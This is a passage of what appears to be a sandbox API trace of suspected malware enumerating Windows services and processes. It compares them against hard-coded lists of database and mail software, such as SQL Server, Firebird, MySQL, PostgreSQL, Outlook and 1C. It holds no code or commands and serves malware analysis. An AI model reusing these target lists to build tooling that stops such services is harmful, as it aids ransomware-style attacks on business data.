lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0044.218] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0044.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0044.218] lstrlenW (lpString="MpsSvc") returned 6 [0044.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0044.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0044.218] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0044.218] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0044.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0044.218] lstrlenW (lpString="Netman") returned 6 [0044.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0044.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0044.218] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0044.219] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0044.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0044.219] lstrlenW (lpString="netprofm") returned 8 [0044.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0044.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0044.219] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0044.219] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0044.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0044.219] lstrlenW (lpString="NlaSvc") returned 6 [0044.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0044.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0044.219] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0044.219] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0044.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0044.219] lstrlenW (lpString="nsi") returned 3 [0044.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0044.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0044.219] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0044.219] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0044.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0044.219] lstrlenW (lpString="PcaSvc") returned 6 [0044.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0044.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0044.219] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0044.219] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0044.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0044.219] lstrlenW (lpString="PlugPlay") returned 8 [0044.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0044.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0044.219] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0044.219] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0044.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0044.219] lstrlenW (lpString="Power") returned 5 [0044.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0044.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0044.220] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0044.220] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0044.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0044.220] lstrlenW (lpString="ProfSvc") returned 7 [0044.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0044.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0044.220] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0044.220] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0044.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0044.220] lstrlenW (lpString="RpcEptMapper") returned 12 [0044.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.220] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0044.220] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0044.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0044.220] lstrlenW (lpString="RpcSs") returned 5 [0044.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0044.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0044.220] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0044.220] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0044.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0044.220] lstrlenW (lpString="SamSs") returned 5 [0044.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0044.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0044.220] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0044.220] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0044.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0044.220] lstrlenW (lpString="Schedule") returned 8 [0044.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0044.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0044.220] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0044.220] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0044.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0044.220] lstrlenW (lpString="SENS") returned 4 [0044.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0044.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0044.221] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0044.221] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0044.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0044.221] lstrlenW (lpString="ShellHWDetection") returned 16 [0044.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.221] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0044.221] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0044.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0044.221] lstrlenW (lpString="Spooler") returned 7 [0044.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0044.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0044.221] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0044.221] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0044.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0044.221] lstrlenW (lpString="swprv") returned 5 [0044.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0044.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0044.221] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0044.221] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0044.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0044.221] lstrlenW (lpString="SysMain") returned 7 [0044.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0044.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0044.221] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0044.221] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0044.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0044.221] lstrlenW (lpString="Themes") returned 6 [0044.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0044.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0044.221] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0044.221] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0044.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0044.222] lstrlenW (lpString="TrkWks") returned 6 [0044.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0044.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0044.222] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0044.222] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0044.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0044.222] lstrlenW (lpString="UxSms") returned 5 [0044.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0044.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0044.222] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0044.222] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0044.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0044.222] lstrlenW (lpString="VSS") returned 3 [0044.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0044.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0044.222] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0044.222] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0044.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0044.222] lstrlenW (lpString="WdiServiceHost") returned 14 [0044.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.222] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0044.222] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0044.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0044.222] lstrlenW (lpString="WdiSystemHost") returned 13 [0044.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.222] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0044.222] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0044.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0044.222] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0044.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.222] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0044.223] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0044.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0044.223] lstrlenW (lpString="Winmgmt") returned 7 [0044.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0044.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0044.223] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0044.223] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0044.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0044.223] lstrlenW (lpString="WPDBusEnum") returned 10 [0044.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.223] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0044.223] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0044.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0044.223] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba5bf8 | out: hHeap=0xb10000) returned 1 [0044.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0044.228] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.229] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.229] lstrlenW (lpString="System") returned 6 [0044.229] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0044.229] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0044.229] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0044.230] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0044.230] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0044.230] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0044.230] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0044.230] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.230] lstrlenW (lpString="smss.exe") returned 8 [0044.230] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0044.230] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0044.230] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0044.230] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0044.230] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0044.231] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0044.231] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0044.231] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.231] lstrlenW (lpString="csrss.exe") returned 9 [0044.231] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0044.231] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0044.231] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0044.231] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0044.231] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0044.231] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0044.231] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0044.231] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.232] lstrlenW (lpString="wininit.exe") returned 11 [0044.232] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0044.232] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0044.232] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0044.232] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.233] lstrlenW (lpString="csrss.exe") returned 9 [0044.233] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.234] lstrlenW (lpString="winlogon.exe") returned 12 [0044.234] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.235] lstrlenW (lpString="services.exe") returned 12 [0044.235] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.235] lstrlenW (lpString="lsass.exe") returned 9 [0044.235] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0044.236] lstrlenW (lpString="lsm.exe") returned 7 [0044.236] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.237] lstrlenW (lpString="svchost.exe") returned 11 [0044.237] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.238] lstrlenW (lpString="svchost.exe") returned 11 [0044.238] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.238] lstrlenW (lpString="svchost.exe") returned 11 [0044.238] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.239] lstrlenW (lpString="svchost.exe") returned 11 [0044.239] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.240] lstrlenW (lpString="svchost.exe") returned 11 [0044.240] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0044.240] lstrlenW (lpString="audiodg.exe") returned 11 [0044.240] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.241] lstrlenW (lpString="svchost.exe") returned 11 [0044.241] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.242] lstrlenW (lpString="svchost.exe") returned 11 [0044.242] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0044.243] lstrlenW (lpString="dwm.exe") returned 7 [0044.243] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0044.244] lstrlenW (lpString="explorer.exe") returned 12 [0044.244] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0044.244] lstrlenW (lpString="spoolsv.exe") returned 11 [0044.245] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.245] lstrlenW (lpString="taskhost.exe") returned 12 [0044.245] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.246] lstrlenW (lpString="svchost.exe") returned 11 [0044.246] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0044.247] lstrlenW (lpString="taskeng.exe") returned 11 [0044.247] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.247] lstrlenW (lpString="taskhost.exe") returned 12 [0044.248] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0044.642] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0044.642] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0044.643] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0044.643] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0044.644] lstrlenW (lpString="sa_shape.exe") returned 12 [0044.644] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0044.645] lstrlenW (lpString="confidence.exe") returned 14 [0044.645] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0044.645] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0044.646] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0044.646] lstrlenW (lpString="blue.exe") returned 8 [0044.646] Process32NextW (in: hSnapshot=0x1b0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, 